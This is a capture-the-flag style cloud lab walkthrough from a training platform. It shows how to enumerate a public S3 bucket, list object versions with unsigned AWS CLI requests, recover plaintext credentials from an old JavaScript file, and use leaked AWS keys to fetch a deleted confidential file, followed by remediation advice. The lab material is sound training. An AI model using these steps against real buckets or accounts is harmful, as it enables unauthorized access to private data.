Access Secrets with S3 Bucket Versioning
Description
We created this beginner-friendly lab to teach about the potential dangers of S3 bucket versioning, if the admins have not sufficiently restricted who can access them, and about the dangers of inadequate data segregation and storing secrets in plain text fields. Advise on remediation is also included. Huge Logistics have engaged the services of your team to perform an external assessment of their cloud environment. You are tasked with assessing an IP range, including the IP address 16.171.123.169
Lab prerequisites
-
Basic Linux command line knowledge
Learning outcomes
-
Basic web enumeration
-
S3 bucket enumeration
-
Identifying and accessing file versions using cURL and the AWS CLI
Difficulty
Foundations
Focus
Red
Starting point
Provided IP Address
Real-world context
S3 versioning can be very useful to guard against accidental file changes and deletions, and may even by mandated in some industries. Although AWS hasn't released any figures relating to the adoption of this feature, it's a something worth checking for when examining buckets. Credentials stored in JavaScript files and other client-side code is a common and real-world security issue. Storing sensitive information such as API keys or credentials directly within JavaScript files exposes them to anyone who can access or view the website's source code, which is inherently public.
Submit Flag
Format: MD5 hash
Walkthrough
Attack
Enumeration
Running a scan against the IP address using Masscan masscan -Pn 16.171.123.169 --top-ports 1000
reveals that TCP port 80 is open.
Running whatweb reveals that it's a login page.
Checking it in a browser we see the page below.
Requesting a non-existent page results in the 404 message below, which this StackOverflow discussion reveals that this is the default for Flask. Flask is a micro web framework written in Python, that depending of configuration can contain flaws in a number of vulnerability classes including SSTI and command injection.
Intercepting the request in Burp we can try to discover other API endpoints, attempt to bypass authentication or try SQL or command injection payloads. However, this wasn't successful, let's check the source code again.
Inspecting the page source code we see that it uses the S3 bucket huge-logistics-dashboard
to host static website files.
The above is an example of the very common regional endpoint URL format but other URL formats are also possible.
-
Path-Style URL (This format is deprecated but might be in use by older buckets):
-
https://s3.amazonaws.com/huge-logistics-data/files/auth.js
-
This style was the original format for S3 URLs.
-
-
Virtual HostedβStyle URL:
-
https://huge-logistics-website.s3.amazonaws.com/static/index.html
-
This format allows the bucket name to be part of the domain.
-
-
Regional Endpoint URL (as in our example):
-
https://huge-logistics-dashboard.s3.eu-north-1.amazonaws.com/static/js/api.js
-
This is a type of Virtual HostedβStyle URL that also includes the AWS region of where the S3 bucket is located. Choosing the regional endpoint URL format can have benefits in latency, cost, compliance and data residency, as well as clarity.
-
-
Dual Stack Endpoint URL (This supports both IPv4 and IPv6):
-
https://huge-logistics-media.s3.dualstack.us-west-1.amazonaws.com/customers.m4v
-
-
S3 Transfer Acceleration URL:
-
https://huge-logistics-data.s3-accelerate.amazonaws.com/backup-0810.zip
-
Provides faster uploads and downloads for enabled buckets.
-
-
S3 Access Points (Assuming an access point name of "invoice-access" and an account ID of "123456789012"):
-
https://invoice-access-123456789012.s3-accesspoint.us-west-1.amazonaws.com/invoice-235573617.pdf
-
S3 Access Points are named endpoints with distinct permissions.
-
Although our bucket includes the region, it's worth noting that we can use cURL to get the region that the bucket was created in, for cases where another URL format is used. The cURL -I
or --head
parameter fetches the headers only.
Returning to the bucket contents we can list the contents with the command below.
We can check out the interestingly named auth.js
. However on inspection it's not too interesting from a security perspective.
However using cURL to request headers for the file is much more interesting! We see it returning the header x-amz-version-id
, which reveals that versioning is enabled on the S3 bucket. Amazon S3 versioning is a feature that can be enabled on S3 buckets to keep multiple versions of an object, including all writes and deletes, in the same bucket. Once versioning is enabled for a bucket, it cannot be suspended, only permanently disabled (and objects already versioned at that point will maintain their versions).
Attempting to confirm this using the AWS CLI command get-bucket-versioning
isn't successful.
aws s3api get-bucket-versioning --bucket huge-logistics-dashboard --no-sign-request
Neither is the first request to list object versions.
However after adding --no-sign-request
we see all file versions! The AWS CLI v2 attempts to sign all requests. This signature is a way to prove the identity of the requester. However if the configured keys don't have permission to access the resource, the signed request will return an "Access Denied" error, even if the bucket is public. To get around this we can use the parameter --no-sign-request
.
β{
ββ"ETag": "\"d41d8cd98f00b204e9800998ecf8427e\"",
ββ"Size": 0,
ββ"StorageClass": "STANDARD",
ββ"Key": "private/",
ββ"VersionId": "LFkKXfYHprr7YC4BgFt5BbQPLLZWfu0B",
ββ"IsLatest": true,
ββ"LastModified": "2023-08-16T18:25:59.000Z",
ββ"Owner": {
βββ"ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
ββ}
β},
β{
ββ"ETag": "\"24f3e7a035c28ef1f75d63a93b980770\"",
ββ"Size": 24119,
ββ"StorageClass": "STANDARD",
ββ"Key": "private/Business Health - Board Meeting (Confidential).xlsx",
ββ"VersionId": "HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8",
ββ"IsLatest": false,
ββ"LastModified": "2023-08-16T19:11:03.000Z",
ββ"Owner": {
βββ"ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
ββ}
β},
β{
ββ"ETag": "\"c3d04472943ae3d20730c1b81a3194d2\"",
ββ"Size": 244,
ββ"StorageClass": "STANDARD",
ββ"Key": "static/js/auth.js",
ββ"VersionId": "j2hElDSlveHRMaivuWldk8KSrC.vIONW",
ββ"IsLatest": true,
ββ"LastModified": "2023-08-12T20:43:43.000Z",
ββ"Owner": {
βββ"ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
ββ}
β},
β{
ββ"ETag": "\"7b63218cfe1da7f845bfc7ba96c2169f\"",
ββ"Size": 463,
ββ"StorageClass": "STANDARD",
ββ"Key": "static/js/auth.js",
ββ"VersionId": "qgWpDiIwY05TGdUvTnGJSH49frH_7.yh",
ββ"IsLatest": false,
ββ"LastModified": "2023-08-12T19:13:25.000Z",
ββ"Owner": {
βββ"ID": "34c9998cfbce44a3b730744a4e1d2db81d242c328614a9147339214165210c56"
ββ}
β}
]
The deleted file Business Health - Board Meeting (Confidential).xlsx seems interesting, but attempting to access it is unsuccessful.
Lateral Movement
We've seen the contents of the current auth.js
file already so let's check out the previous version.
ββ$(".btn-login").on("click", login);
});
function login(){
ββemail = $('#emailForm')[0].value;
ββpassword = $('#passwordForm')[0].value;
ββdata = {'email':email, 'password':password};
ββdoLogin(data);
}
//Please remove this after testing. Password change is not necessary to implement so keep this secure!
function test_login(){
ββββdata = {'email':'admin@huge-logistics.com', 'password':'H4mpturTiem213!'}
ββββdoLogin(data);
}
Credentials in plain text! We use them to login and access what seems to be a reporting dashboard on business performance.
The Notes section of the profile contains AWS keys...
After setting the keys with aws configure
we try again to request the previous version of the now deleted file. Success!
Opening the spreadsheet we see a balance sheet and P&L account showing choppy waters... and of course the flag. PWNED!
Defense
The organization and segregation of data within an AWS S3 infrastructure are crucial for both operational efficiency and security. By keeping specific types of data in designated buckets, you ensure that the permissions related to data classification are appropriate. As we saw in this scenario, it was possible to access confidential data even through the original file was deleted from the bucket and we didn't have access to retrieve the file version, as the compromised web application contained credentials that could access the entire bucket and all file versions.
It's important to ensure that only trusted entities have the s3:ListBucketVersions
and s3:GetObjectVersion
permissions, as previous files may have been created mistakenly or during testing that disclosed sensitive data. The admin should also delete the dangling file version record using the command below.
Storing AWS credentials in text fields in applications is a bad practice that can lead malicious actors to move laterally and vertically from the initial point of compromise. AWS Secrets Manager, other secret management or privileged access management (PAM) software can be used instead.
Further reading
https://hackerone.com/reports/991718
Pwned Labs:
Your cloud security training ground
Experience, real-world, byte sized cloud security labs for training cyber warriors. From beginners to pros, our engaging platform allows you to secure your defenses, ignite your career and stay ahead of threats.